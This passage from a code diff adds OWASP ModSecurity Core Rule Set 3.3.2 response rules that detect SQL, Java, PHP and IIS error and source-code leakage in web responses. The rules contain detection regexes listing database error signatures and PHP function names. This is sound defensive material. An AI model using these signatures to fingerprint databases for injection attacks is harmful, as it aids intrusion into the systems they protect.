msg:'firebird SQL Information Leakage',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-firebird',\
tag:'attack-disclosure',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/118/116/54',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
chain"
SecRule RESPONSE_BODY "@rx (?i)Dynamic SQL Error" \
"capture,\
setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule TX:sql_error_match "@eq 1" \
"id:951160,\
phase:4,\
block,\
capture,\
t:none,\
msg:'Frontbase SQL Information Leakage',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-frontbase',\
tag:'attack-disclosure',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/118/116/54',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
chain"
SecRule RESPONSE_BODY "@rx (?i)Exception (?:condition )?\d+\. Transaction rollback\." \
"capture,\
setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule TX:sql_error_match "@eq 1" \
"id:951170,\
phase:4,\
block,\
capture,\
t:none,\
msg:'hsqldb SQL Information Leakage',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-hsqldb',\
tag:'attack-disclosure',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/118/116/54',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
chain"
SecRule RESPONSE_BODY "@rx (?i)org\.hsqldb\.jdbc" \
"capture,\
setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule TX:sql_error_match "@eq 1" \
"id:951180,\
phase:4,\
block,\
capture,\
t:none,\
msg:'informix SQL Information Leakage',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-informix',\
tag:'attack-disclosure',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/118/116/54',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
chain"
SecRule RESPONSE_BODY "@rx (?i:An illegal character has been found in the statement|com\.informix\.jdbc|Exception.*Informix)" \
"capture,\
setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule TX:sql_error_match "@eq 1" \
"id:951190,\
phase:4,\
block,\
capture,\
t:none,\
msg:'ingres SQL Information Leakage',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-ingres',\
tag:'attack-disclosure',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/118/116/54',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
chain"
SecRule RESPONSE_BODY "@rx (?i:Warning.*ingres_|Ingres SQLSTATE|Ingres\W.*Driver)" \
"capture,\
setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule TX:sql_error_match "@eq 1" \
"id:951200,\
phase:4,\
block,\
capture,\
t:none,\
msg:'interbase SQL Information Leakage',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-interbase',\
tag:'attack-disclosure',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/118/116/54',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
chain"
SecRule RESPONSE_BODY "@rx (?i:<b>Warning</b>: ibase_|Unexpected end of command in statement)" \
"capture,\
setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule TX:sql_error_match "@eq 1" \
"id:951210,\
phase:4,\
block,\
capture,\
t:none,\
msg:'maxDB SQL Information Leakage',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-maxdb',\
tag:'attack-disclosure',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/118/116/54',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
chain"
SecRule RESPONSE_BODY "@rx (?i:SQL error.*POS[0-9]+.*|Warning.*maxdb.*)" \
"capture,\
setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule TX:sql_error_match "@eq 1" \
"id:951220,\
phase:4,\
block,\
capture,\
t:none,\
msg:'mssql SQL Information Leakage',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-mssql',\
tag:'attack-disclosure',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/118/116/54',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
chain"
SecRule RESPONSE_BODY "@rx (?i)(?:System\.Data\.OleDb\.OleDbException|\[Microsoft\]\[ODBC SQL Server Driver\]|\[Macromedia\]\[SQLServer JDBC Driver\]|\[SqlException|System\.Data\.SqlClient\.SqlException|Unclosed quotation mark after the character string|'80040e14'|mssql_query\(\)|Microsoft OLE DB Provider for ODBC Drivers|Microsoft OLE DB Provider for SQL Server|Incorrect syntax near|Sintaxis incorrecta cerca de|Syntax error in string in query expression|Procedure or function .* expects parameter|Unclosed quotation mark before the character string|Syntax error .* in query expression|Data type mismatch in criteria expression\.|ADODB\.Field \(0x800A0BCD\)|the used select statements have different number of columns|OLE DB.*SQL Server|Warning.*mssql_.*|Driver.*SQL[ _-]*Server|SQL Server.*Driver|SQL Server.*[0-9a-fA-F]{8}|Exception.*\WSystem\.Data\.SqlClient\.)" \
"capture,\
setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule TX:sql_error_match "@eq 1" \
"id:951230,\
phase:4,\
block,\
capture,\
t:none,\
msg:'mysql SQL Information Leakage',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-mysql',\
tag:'attack-disclosure',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/118/116/54',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
chain"
SecRule RESPONSE_BODY "@rx (?i)(?:supplied argument is not a valid MySQL|Column count doesn't match value count at row|mysql_fetch_array\(\)|on MySQL result index|You have an error in your SQL syntax;|You have an error in your SQL syntax near|MySQL server version for the right syntax to use|\[MySQL\]\[ODBC|Column count doesn't match|Table '[^']+' doesn't exist|SQL syntax.*MySQL|Warning.*mysql_.*|valid MySQL result|MySqlClient\.)" \
"capture,\
setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule TX:sql_error_match "@eq 1" \
"id:951240,\
phase:4,\
block,\
capture,\
t:none,\
msg:'postgres SQL Information Leakage',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-pgsql',\
tag:'attack-disclosure',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/118/116/54',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
chain"
SecRule RESPONSE_BODY "@rx (?i:PostgreSQL query failed:|pg_query\(\) \[:|pg_exec\(\) \[:|PostgreSQL.*ERROR|Warning.*pg_.*|valid PostgreSQL result|Npgsql\.|PG::[a-zA-Z]*Error|Supplied argument is not a valid PostgreSQL .*? resource|Unable to connect to PostgreSQL server)" \
"capture,\
setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule TX:sql_error_match "@eq 1" \
"id:951250,\
phase:4,\
block,\
capture,\
t:none,\
msg:'sqlite SQL Information Leakage',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-sqlite',\
tag:'attack-disclosure',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/118/116/54',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
chain"
SecRule RESPONSE_BODY "@rx (?i)(?:Warning.*sqlite_.*|Warning.*SQLite3::|SQLite/JDBCDriver|SQLite\.Exception|System\.Data\.SQLite\.SQLiteException)" \
"capture,\
setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule TX:sql_error_match "@eq 1" \
"id:951260,\
phase:4,\
block,\
capture,\
t:none,\
msg:'Sybase SQL Information Leakage',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-sybase',\
tag:'attack-disclosure',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/118/116/54',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
chain"
SecRule RESPONSE_BODY "@rx (?i)(?:Sybase message:|Warning.*sybase.*|Sybase.*Server message.*)" \
"capture,\
setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:951013,phase:3,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:951014,phase:4,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL"
#
# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:951015,phase:3,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:951016,phase:4,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL"
#
# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:951017,phase:3,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:951018,phase:4,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL"
#
# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher)
#
#
# -= Paranoia Levels Finished =-
#
SecMarker "END-RESPONSE-951-DATA-LEAKAGES-SQL"

103
core/modsecurity/files/coreruleset/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf Normal file
View File

@@ -0,0 +1,103 @@
# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.2
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENSE file for full details.
# ------------------------------------------------------------------------
#
# -= Paranoia Level 0 (empty) =- (apply unconditionally)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:952011,phase:3,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:952012,phase:4,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA"
#
# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher)
#
#
# -=[ Java Source Code Leakages ]=-
#
SecRule RESPONSE_BODY "@pmFromFile java-code-leakages.data" \
"id:952100,\
phase:4,\
block,\
capture,\
t:none,\
msg:'Java Source Code Leakage',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-java',\
tag:'platform-multi',\
tag:'attack-disclosure',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/118/116',\
tag:'PCI/6.5.6',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'ERROR',\
setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'"
#
# -=[ Java Errors ]=-
#
# Ref: https://github.com/andresriancho/w3af/blob/master/w3af/plugins/grep/error_pages.py
#
SecRule RESPONSE_BODY "@pmFromFile java-errors.data" \
"id:952110,\
phase:4,\
block,\
capture,\
t:none,\
msg:'Java Errors',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-java',\
tag:'platform-multi',\
tag:'attack-disclosure',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/118/116',\
tag:'PCI/6.5.6',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'ERROR',\
setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:952013,phase:3,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:952014,phase:4,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA"
#
# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:952015,phase:3,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:952016,phase:4,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA"
#
# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:952017,phase:3,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:952018,phase:4,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA"
#
# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher)
#
#
# -= Paranoia Levels Finished =-
#
SecMarker "END-RESPONSE-952-DATA-LEAKAGES-JAVA"

137
core/modsecurity/files/coreruleset/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf Normal file
View File

@@ -0,0 +1,137 @@
# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.2
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENSE file for full details.
# ------------------------------------------------------------------------
#
# -= Paranoia Level 0 (empty) =- (apply unconditionally)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:953011,phase:3,pass,nolog,skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:953012,phase:4,pass,nolog,skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP"
#
# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher)
#
#
# -=[ PHP Error Message Leakage ]=-
#
SecRule RESPONSE_BODY "@pmFromFile php-errors.data" \
"id:953100,\
phase:4,\
block,\
capture,\
t:none,\
msg:'PHP Information Leakage',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-php',\
tag:'platform-multi',\
tag:'attack-disclosure',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/118/116',\
tag:'PCI/6.5.6',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'ERROR',\
setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'"
#
# -=[ PHP source code leakage ]=-
#
# Detect some common PHP keywords in output.
#
SecRule RESPONSE_BODY "@rx (?:\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\$_(?:(?:pos|ge)t|session))\b" \
"id:953110,\
phase:4,\
block,\
capture,\
t:none,\
msg:'PHP source code leakage',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-php',\
tag:'platform-multi',\
tag:'attack-disclosure',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/118/116',\
tag:'PCI/6.5.6',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'ERROR',\
setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'"
# Detect the presence of the PHP open tag "<?" or "<?php" in output.
#
# To prevent false positives due to the short "<?" sequence, an attempt
# is made to stop alerts in binary output. This is done by detecting
# some common binary file format headers, such as gzip (\x1f\x8b\x08),
# png (IHDR), mp3 (ID3), movie formats et cetera.
#
# Not supported by re2 (?!re).
#
SecRule RESPONSE_BODY "@rx <\?(?!xml)" \
"id:953120,\
phase:4,\
block,\
capture,\
t:none,\
msg:'PHP source code leakage',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-php',\
tag:'platform-multi',\
tag:'attack-disclosure',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/118/116',\
tag:'PCI/6.5.6',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'ERROR',\
chain"
SecRule RESPONSE_BODY "!@rx (?:\x1f\x8b\x08|\b(?:(?:i(?:nterplay|hdr|d3)|m(?:ovi|thd)|r(?:ar!|iff)|(?:ex|jf)if|f(?:lv|ws)|varg|cws)\b|gif)|B(?:%pdf|\.ra)\b|^wOF[F2])" \
"capture,\
t:none,\
setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:953013,phase:3,pass,nolog,skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:953014,phase:4,pass,nolog,skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP"
#
# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:953015,phase:3,pass,nolog,skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:953016,phase:4,pass,nolog,skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP"
#
# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:953017,phase:3,pass,nolog,skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:953018,phase:4,pass,nolog,skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP"
#
# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher)
#
#
# -= Paranoia Levels Finished =-
#
SecMarker "END-RESPONSE-953-DATA-LEAKAGES-PHP"

151
core/modsecurity/files/coreruleset/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf Normal file
View File

@@ -0,0 +1,151 @@
# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.2
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENSE file for full details.
# ------------------------------------------------------------------------
#
# -= Paranoia Level 0 (empty) =- (apply unconditionally)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:954011,phase:3,pass,nolog,skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:954012,phase:4,pass,nolog,skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS"
#
# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher)
#
# IIS default location
SecRule RESPONSE_BODY "@rx [a-z]:\\\\inetpub\b" \
"id:954100,\
phase:4,\
block,\
capture,\
t:none,t:lowercase,\
msg:'Disclosure of IIS install location',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-iis',\
tag:'platform-windows',\
tag:'attack-disclosure',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/118/116',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'ERROR',\
setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'"
SecRule RESPONSE_BODY "@rx (?:Microsoft OLE DB Provider for SQL Server(?:<\/font>.{1,20}?error '800(?:04005|40e31)'.{1,40}?Timeout expired| \(0x80040e31\)<br>Timeout expired<br>)|<h1>internal server error<\/h1>.*?<h2>part of the server has crashed or it has a configuration error\.<\/h2>|cannot connect to the server: timed out)" \
"id:954110,\
phase:4,\
block,\
capture,\
t:none,\
msg:'Application Availability Error',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-iis',\
tag:'platform-windows',\
tag:'attack-disclosure',\
tag:'paranoia-level/1',\
tag:'PCI/6.5.6',\
tag:'OWASP_CRS',\
tag:'capec/1000/118/116',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'ERROR',\
setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'"
#
# IIS Errors leakage
#
SecRule RESPONSE_BODY "@rx (?:\b(?:A(?:DODB\.Command\b.{0,100}?\b(?:Application uses a value of the wrong type for the current operation\b|error')| trappable error occurred in an external object\. The script cannot continue running\b)|Microsoft VBScript (?:compilation (?:\(0x8|error)|runtime (?:Error|\(0x8))\b|Object required: '|error '800)|<b>Version Information:<\/b>(?:&nbsp;|\s)(?:Microsoft \.NET Framework|ASP\.NET) Version:|>error 'ASP\b|An Error Has Occurred|>Syntax error in string in query expression|\/[Ee]rror[Mm]essage\.aspx?\?[Ee]rror\b)" \
"id:954120,\
phase:4,\
block,\
capture,\
t:none,\
msg:'IIS Information Leakage',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-iis',\
tag:'platform-windows',\
tag:'attack-disclosure',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/118/116',\
tag:'PCI/6.5.6',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'ERROR',\
setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'"
SecRule RESPONSE_STATUS "!@rx ^404$" \
"id:954130,\
phase:4,\
block,\
capture,\
t:none,\
msg:'IIS Information Leakage',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-iis',\
tag:'platform-windows',\
tag:'attack-disclosure',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/118/116',\
tag:'PCI/6.5.6',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'ERROR',\
chain"
SecRule RESPONSE_BODY "@rx \bServer Error in.{0,50}?\bApplication\b" \
"capture,\
t:none,\
setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:954013,phase:3,pass,nolog,skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:954014,phase:4,pass,nolog,skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS"
#
# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:954015,phase:3,pass,nolog,skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:954016,phase:4,pass,nolog,skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS"
#
# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:954017,phase:3,pass,nolog,skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:954018,phase:4,pass,nolog,skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS"
#
# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher)
#
#
# -= Paranoia Levels Finished =-
#
SecMarker "END-RESPONSE-954-DATA-LEAKAGES-IIS"

115
core/modsecurity/files/coreruleset/rules/RESPONSE-959-BLOCKING-EVALUATION.conf Normal file
View File

@@ -0,0 +1,115 @@
# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.2
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENSE file for full details.
# ------------------------------------------------------------------------
# You should set the score to the proper threshold you would prefer. If kept at "@gt 0"
